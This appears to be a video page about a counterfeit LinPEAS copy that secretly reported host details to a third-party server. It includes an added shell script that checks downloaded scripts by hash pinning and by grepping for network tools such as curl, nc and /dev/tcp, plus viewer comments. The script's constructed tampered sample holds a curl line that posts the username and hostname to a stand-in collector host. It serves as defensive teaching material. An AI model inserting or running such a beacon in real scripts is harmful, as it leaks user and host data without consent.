Why You MUST Audit Open Source Tools Before Use

Last week, a counterfeit copy of LinPEAS, the widely used open-source Linux privilege-escalation enumeration script, was found to contain a hidden remote logging routine that quietly reported details about the host it ran on to a third-party server. The lesson for developers and organizations alike: verify every open-source tool and script before you run it. Fetch it from the project's original repository, compare it against a published hash or signature where one exists, and read what it does before executing it, not after.

In this short, Andrew Bellini walks through the technical details of the incident and shares practical steps your team can take to stay secure when using open-source software.

Stay informed and safeguard your workflows. Watch now!
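The two checks the description calls for, pinning a hash and looking for outbound network calls, as an added example. This is my own script, not code from the video or from the LinPEAS project. The "clean" and "tampered" enumeration scripts are constructed stand-ins built inside the block, the pinned hash is computed from the constructed clean copy so the example runs offline (in practice it comes from the upstream release you trust), and collector.example.invalid is a reserved, non-resolving domain.

```shell
#!/bin/sh
# Added example (not from the video or the LinPEAS project): two checks to
# run on a downloaded script BEFORE executing it.
#   1. pin_check    - compare the file's SHA-256 with a hash you recorded from
#                     the upstream release you trust (re-downloading from the
#                     same mirror proves nothing).
#   2. egress_lines - list the non-comment lines that could open an outbound
#                     connection or unpack an embedded payload. A local
#                     privilege-escalation enumerator has no reason to do either.
# Neither check replaces reading the script; they tell you where to read first.
set -u

# Commands and shell idioms that move data off the host or decode hidden code.
# The leading group is a portable stand-in for a word boundary.
EGRESS_PATTERN='(^|[^[:alnum:]_])(curl|wget|nc|ncat|netcat|socat)([[:space:]]|$)|/dev/(tcp|udp)/|openssl s_client|base64 (-d|--decode)'

# egress_lines FILE: print "lineno:text" for each matching line that is not a
# comment. Prints nothing for a clean script.
egress_lines() {
    grep -nE "$EGRESS_PATTERN" "$1" 2>/dev/null \
        | grep -vE '^[0-9]+:[[:space:]]*#' || true
}

# egress_count FILE: number of suspicious lines (0 means nothing flagged).
egress_count() {
    egress_lines "$1" | grep -c . || true
}

# sha256_of FILE: hex digest, using whichever tool the host has.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# pin_check FILE EXPECTED_HEX: succeed only if FILE hashes to the pinned value.
pin_check() {
    [ "$(sha256_of "$1")" = "$2" ]
}

# --- constructed sample input (a stand-in, not the real LinPEAS) -------------
WORK=$(mktemp -d)
CLEAN="$WORK/enum.sh"
TAMPERED="$WORK/enum_tampered.sh"

cat > "$CLEAN" <<'EOF'
#!/bin/bash
# local enumeration: read-only, no network
echo "[*] $(id)"
echo "[*] $(uname -a)"
find / -perm -4000 -type f 2>/dev/null
EOF

# Same script plus one extra line: a silent beacon that posts user and host to
# a remote server. example.invalid is reserved and never resolves.
cp "$CLEAN" "$TAMPERED"
cat >> "$TAMPERED" <<'EOF'
curl -s -X POST -d "u=$(whoami)&h=$(hostname)" https://collector.example.invalid/log >/dev/null 2>&1 &
EOF

# In practice this value comes from the upstream release page or a signed
# checksum file you obtained separately. Here it is computed from the
# constructed clean copy so the example runs offline.
PINNED_SHA256=$(sha256_of "$CLEAN")

# --- demo --------------------------------------------------------------------
for f in "$CLEAN" "$TAMPERED"; do
    if pin_check "$f" "$PINNED_SHA256"; then
        echo "$f: hash matches pinned release"
    else
        echo "$f: HASH MISMATCH, do not run"
    fi
    echo "$f: $(egress_count "$f") suspicious line(s)"
    egress_lines "$f"
done
```

The hash check catches any modification at all, but only if the pinned value came from somewhere other than the download you are checking. The egress scan is deliberately crude: it is a triage aid that points you at the lines worth reading, and a script that builds its command names at runtime or hides them in an encoded blob will slip past it, which is exactly why the `base64 -d` idiom is on the list.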

#linpeas #infosec #hacking #opensource #shorts

Comments

How do I verify or audit open source software?

mohammadkamrul

First video I saw from you and subbed.
Very rare for me. Masterfully explained.

smreha

Very interesting, thanks. Although I found the background music too loud and distracting.

datasilouk

His keyboard sounds are really soothing

xbazka

The companies I work for require me to do that. If I use an open source library in code, or a plugin in an IDE or so, I have to sign with my blood and soul that this is trusted.

We also fork open source code so that no random new stuff might get injected and so on.

Pain in the ass but secure.

KDSBestGameDev

This short cured my depression, literally. It motivates me to keep going.

naesone

Scripts I do glance over. But open source software is too much. Most open-source tools are too big to check all lines of code.

redcrafterlppa

What's the point in collecting that data specifically? Username and hostname, etc. Like, what value does that really have?

deano_sk

Why would you click that one, though, when the GitHub one is right under it?

duarteribeiro

Exactly why Linux is not a good desktop for regular users, but for power users / servers only.

sale

So what's wrong with it? There isn't any sensitive data in it. Why does this example show I need to audit open source?

respise

Can anybody explain how this information is useful to the one who receives it?

sharathkumark

Nothing "sketchy" about it. They've built automatic reporting into an audit tool. It is smart. Instead of crying foul, you should modify it to send the reporting to an in-house repository so that you will automatically have it for inclusion in your final report or for use in a follow-up tool.
Often I will break down the work required to produce an intended result into a series of tasks. I'll script each task separately and save the output as input for the next task. I do this because many solutions break down into tasks that are common to other solutions. I then have what I need to chain calls to these scripts into various solutions.
To claim that an open source tool provider is surreptitiously gathering data for nefarious purposes is absurd. It is open source. Their user base can cat the script and easily recognize HTTP transactions as they fly by on the console; if they can't, they're probably in the wrong profession. I'm not sorry to call this out as a false alarm intended to generate views.

DanielKreimendahl

I am a simple user. I VM everything I do not trust; if it performs fine in a VM, then its life will be in a VM.

ProtoType